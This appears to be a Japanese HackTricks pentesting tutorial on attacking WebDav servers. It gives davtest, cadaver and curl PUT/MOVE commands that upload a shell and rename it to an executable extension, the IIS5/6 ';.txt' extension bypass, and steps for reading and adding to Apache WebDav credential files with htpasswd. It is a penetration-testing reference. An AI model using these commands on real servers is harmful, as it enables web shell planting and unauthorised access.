WebDav

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。 今すぐアクセスを取得:

HackTricksをサポートする

WebDavが有効なHTTPサーバーを扱う際、正しい資格情報があればファイルを操作することが可能です。通常、これはHTTP基本認証を通じて確認されます。このようなサーバーを制御するには、しばしばウェブシェルのアップロードと実行が関与します。

WebDavサーバーへのアクセスには通常、有効な資格情報が必要であり、WebDavブルートフォースがそれを取得する一般的な方法です。

ファイルのアップロードに対する制限、特にサーバーサイドスクリプトの実行を防ぐ制限を克服するために、次のことができます:

  • 制限がない場合、実行可能な拡張子を持つファイルを直接アップロードする。

  • アップロードした非実行可能ファイル(.txtなど)の名前を実行可能な拡張子に変更する。

  • アップロードした非実行可能ファイルをコピーし、その拡張子を実行可能なものに変更する。

DavTest

Davtestは、異なる拡張子を持つ複数のファイルをアップロードし、拡張子が実行されるかどうかを確認します:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

これは、.txtおよび**.html拡張子が実行されている**ことを意味するわけではありません。これは、これらのファイルにアクセスできることを意味します。

Cadaver

このツールを使用して、WebDavサーバーに手動で接続し、(アップロード移動、または削除などの)アクションを実行できます。

cadaver <IP>

PUT リクエスト

curl -T 'shell.txt' 'http://$ip'

MOVE リクエスト

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。 今すぐアクセスを取得:

IIS5/6 WebDavの脆弱性

この脆弱性は非常に興味深いです。WebDavは**.asp拡張子のファイルをアップロードまたは名前変更することを許可しません**。しかし、名前の最後に**";.txt"を追加することでバイパスできます。そうすると、そのファイルはあたかも .asp ファイルであるかのように実行されます(".txt"の代わりに".html"を使用することもできますが、";"を忘れないでください)。

その後、あなたはシェルを**".txt"ファイルとしてアップロードし、".asp;.txt"ファイルにコピー/移動できます。そのファイルにウェブサーバーを通じてアクセスすると、それは実行**されます(cadaverは移動アクションが機能しなかったと言いますが、実際には機能しました)。

資格情報のポスト

WebdavがApacheサーバーを使用している場合、Apacheで構成されたサイトを確認する必要があります。一般的には: /etc/apache2/sites-enabled/000-default

その中には次のようなものが見つかるかもしれません:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

ご覧のとおり、webdav サーバーの有効な credentials を含むファイルがあります:

/etc/apache2/users.password

このタイプのファイルの中には、usernamehash のパスワードが含まれています。これらは、webdav サーバーがユーザーを認証するために使用している資格情報です。

これらを crack するか、何らかの理由で webdav サーバーに access したい場合は、add more を試みることができます:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

新しい資格情報が機能しているか確認するには、次のことを行います:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

References

Support HackTricks

Use Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。 Get Access Today:

Last updated